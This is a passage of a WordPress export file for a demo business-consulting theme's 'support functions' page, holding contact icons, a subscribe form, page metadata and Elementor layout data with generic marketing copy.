		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>999</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[support-function]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"49a9e54","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"f99cdb9","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"02efcb6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"2ce419a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"6119ae9","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"61708e5","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"842b3f0","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"6339130","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"306f17a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"781b565","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdc54b6","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8335d80","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8f5e31e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"e5c28dd","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"080e76c","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#D92300","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ea3f620","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16b4e3e","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3893a38","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"29df260","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"348e8e4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b035bd5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"93ca462","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"899f255","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"72fb2ed","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"ccc4166","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home3.png","id":1701},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"31ae611","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"4d5a916","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #d92300;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"bdf1c78","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4a42617","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"d6f9d84","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1eca910","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"ece40a4","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"e3aefa2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"18deaa2","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"f3267e7","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#D92300","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb2e77","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"64a2dd8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"87b1729","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"f10f882","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9647d28","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"89800c0","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"a10b197","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1f4fc86","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7074fb9","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"cea57b4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home3.jpg","id":1705},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"8fa96d0","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"a21322d","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7bd52aa","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"6dee9d6","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"d171158","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"530fc3d","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"42428d8","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i